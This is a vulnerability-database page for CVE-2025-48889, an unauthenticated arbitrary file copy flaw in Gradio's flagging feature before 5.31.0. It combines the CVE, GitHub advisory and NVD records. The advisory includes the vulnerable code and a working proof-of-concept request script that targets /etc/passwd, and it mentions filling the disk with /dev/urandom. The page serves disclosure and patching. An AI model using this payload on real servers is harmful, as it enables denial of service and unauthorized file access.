cvelistv5 - cve-2025-48889

CVE-2025-48889 (GCVE-0-2025-48889)

Vulnerability from cvelistv5 – Published: 2025-05-30 06:12 – Updated: 2025-05-30 12:25

Summary

Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-434 - Unrestricted Upload of File with Dangerous Type

Assigner

GitHub_M

References

URL

Tags

https://github.com/gradio-app/gradio/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	gradio-app	gradio	Affected: < 5.31.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-48889",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-30T12:25:32.162253Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-30T12:25:35.195Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gradio",
          "vendor": "gradio-app",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.31.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-30T06:12:32.703Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
        }
      ],
      "source": {
        "advisory": "GHSA-8jw3-6x8j-v96g",
        "discovery": "UNKNOWN"
      },
      "title": "Gradio Allows Unauthorized File Copy via Path Manipulation"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-48889",
    "datePublished": "2025-05-30T06:12:32.703Z",
    "dateReserved": "2025-05-27T20:14:34.297Z",
    "dateUpdated": "2025-05-30T12:25:35.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-48889\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-30T06:15:28.500\",\"lastModified\":\"2025-08-26T16:28:02.880\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0.\"},{\"lang\":\"es\",\"value\":\"Gradio es un paquete de Python de c\u00f3digo abierto que permite la creaci\u00f3n r\u00e1pida de demos y aplicaciones web para modelos de aprendizaje autom\u00e1tico, API o cualquier funci\u00f3n arbitraria de Python. Antes de la versi\u00f3n 5.31.0, una vulnerabilidad de copia arbitraria de archivos en la funci\u00f3n de marcado de Gradio permit\u00eda a atacantes no autenticados copiar cualquier archivo legible del sistema de archivos del servidor. Si bien los atacantes no pueden leer estos archivos copiados, pueden causar un ataque de denegaci\u00f3n de servicio (DoS) al copiar archivos grandes (como /dev/urandom) para llenar el espacio del disco. Este problema se ha corregido en la versi\u00f3n 5.31.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*\",\"versionStartIncluding\":\"5.25.2\",\"versionEndExcluding\":\"5.31.0\",\"matchCriteriaId\":\"E9E408DE-CEB8-4CC4-88D1-899F2D603577\"}]}]}],\"references\":[{\"url\":\"https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]},{\"url\":\"https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-48889\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-05-30T12:25:32.162253Z\"}}}], \"references\": [{\"url\": \"https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-30T12:25:23.932Z\"}}], \"cna\": {\"title\": \"Gradio Allows Unauthorized File Copy via Path Manipulation\", \"source\": {\"advisory\": \"GHSA-8jw3-6x8j-v96g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"gradio-app\", \"product\": \"gradio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 5.31.0\"}]}], \"references\": [{\"url\": \"https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g\", \"name\": \"https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-434\", \"description\": \"CWE-434: Unrestricted Upload of File with Dangerous Type\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-05-30T06:12:32.703Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-48889\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-30T12:25:35.195Z\", \"dateReserved\": \"2025-05-27T20:14:34.297Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-05-30T06:12:32.703Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-8JW3-6X8J-V96G

Vulnerability from github – Published: 2025-05-29 22:36 – Updated: 2025-05-30 15:18

Summary

Gradio Allows Unauthorized File Copy via Path Manipulation

Details

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.

Description

The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies.

Source: User-controlled path parameter in the flagging functionality JSON payload
Sink: shutil.copy operation in FileData._copy_to_dir() method

The vulnerable code flow: 1. A JSON payload is sent to the /gradio_api/run/predict endpoint 2. The path field within FileData object can reference any file on the system 3. When processing this request, the Component.flag() method creates a GradioDataModel object 4. The FileData._copy_to_dir() method uses this path without proper validation:

def _copy_to_dir(self, dir: str) -> FileData:
    pathlib.Path(dir).mkdir(exist_ok=True)
    new_obj = dict(self)

    if not self.path:
        raise ValueError("Source file path is not set")
    new_name = shutil.copy(self.path, dir)  # vulnerable sink
    new_obj["path"] = new_name
    return self.__class__(**new_obj)

The lack of validation allows copying any file the Gradio process can read

PoC

The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory:

Setup a Gradio app:

import gradio as gr

def image_classifier(inp):
    return {'cat': 0.2, 'dog': 0.8}

test = gr.Interface(fn=image_classifier, inputs="image", outputs="label")

test.launch(share=True)

Run the PoC:

import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"  
headers = {
    "Content-Type": "application/json",  
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" 
}

payload = {
    "data": [
        {
            "path": "/etc/passwd",  
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config", 
            "size": 5000,  
            "mime_type": "text/plain", 
            "meta": {
                "_type": "gradio.FileData"  
            }
        },
        {}  
    ],
    "event_data": None,
    "fn_index": 4, 
    "trigger_id": 11, 
    "session_hash": "test123"  
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T22:36:59Z",
    "nvd_published_at": "2025-05-30T06:15:28Z",
    "severity": "MODERATE"
  },
  "details": "An arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.\n\n### Description\nThe flagging component doesn\u0027t properly validate file paths before copying files. Attackers can send specially crafted requests to the `/gradio_api/run/predict` endpoint to trigger these file copies.\n\n**Source**: User-controlled `path` parameter in the flagging functionality JSON payload  \n**Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method\n\nThe vulnerable code flow:\n1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint\n2. The `path` field within `FileData` object can reference any file on the system\n3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object\n4. The `FileData._copy_to_dir()` method uses this path without proper validation:\n\n```python\ndef _copy_to_dir(self, dir: str) -\u003e FileData:\n    pathlib.Path(dir).mkdir(exist_ok=True)\n    new_obj = dict(self)\n\n    if not self.path:\n        raise ValueError(\"Source file path is not set\")\n    new_name = shutil.copy(self.path, dir)  # vulnerable sink\n    new_obj[\"path\"] = new_name\n    return self.__class__(**new_obj)\n```\n5. The lack of validation allows copying any file the Gradio process can read\n\n### PoC\nThe following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio\u0027s flagged directory:\n\n\nSetup a Gradio app:\n\n```python\nimport gradio as gr\n\ndef image_classifier(inp):\n    return {\u0027cat\u0027: 0.2, \u0027dog\u0027: 0.8}\n\ntest = gr.Interface(fn=image_classifier, inputs=\"image\", outputs=\"label\")\n\ntest.launch(share=True)\n```\n\nRun the PoC:\n\n```python\nimport requests\n\nurl = \"https://[your-gradio-app-url]/gradio_api/run/predict\"  \nheaders = {\n    \"Content-Type\": \"application/json\",  \n    \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36\" \n}\n\npayload = {\n    \"data\": [\n        {\n            \"path\": \"/etc/passwd\",  \n            \"url\": \"[your-gradio-app-url]\",\n            \"orig_name\": \"network_config\", \n            \"size\": 5000,  \n            \"mime_type\": \"text/plain\", \n            \"meta\": {\n                \"_type\": \"gradio.FileData\"  \n            }\n        },\n        {}  \n    ],\n    \"event_data\": None,\n    \"fn_index\": 4, \n    \"trigger_id\": 11, \n    \"session_hash\": \"test123\"  \n}\n\nresponse = requests.post(url, headers=headers, json=payload)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Body: {response.text}\")\n```",
  "id": "GHSA-8jw3-6x8j-v96g",
  "modified": "2025-05-30T15:18:21Z",
  "published": "2025-05-29T22:36:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48889"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio Allows Unauthorized File Copy via Path Manipulation"
}

FKIE_CVE-2025-48889

Vulnerability from fkie_nvd - Published: 2025-05-30 06:15 - Updated: 2025-08-26 16:28

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g	Third Party Advisory, Exploit
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g	Third Party Advisory, Exploit

Impacted products

	Vendor	Product	Version
	gradio_project	gradio	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "E9E408DE-CEB8-4CC4-88D1-899F2D603577",
              "versionEndExcluding": "5.31.0",
              "versionStartIncluding": "5.25.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0."
    },
    {
      "lang": "es",
      "value": "Gradio es un paquete de Python de c\u00f3digo abierto que permite la creaci\u00f3n r\u00e1pida de demos y aplicaciones web para modelos de aprendizaje autom\u00e1tico, API o cualquier funci\u00f3n arbitraria de Python. Antes de la versi\u00f3n 5.31.0, una vulnerabilidad de copia arbitraria de archivos en la funci\u00f3n de marcado de Gradio permit\u00eda a atacantes no autenticados copiar cualquier archivo legible del sistema de archivos del servidor. Si bien los atacantes no pueden leer estos archivos copiados, pueden causar un ataque de denegaci\u00f3n de servicio (DoS) al copiar archivos grandes (como /dev/urandom) para llenar el espacio del disco. Este problema se ha corregido en la versi\u00f3n 5.31.0."
    }
  ],
  "id": "CVE-2025-48889",
  "lastModified": "2025-08-26T16:28:02.880",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-05-30T06:15:28.500",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory",
        "Exploit"
      ],
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Third Party Advisory",
        "Exploit"
      ],
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-48889 (GCVE-0-2025-48889)

GHSA-8JW3-6X8J-V96G

Description

PoC

FKIE_CVE-2025-48889

Tags

Sightings

Nomenclature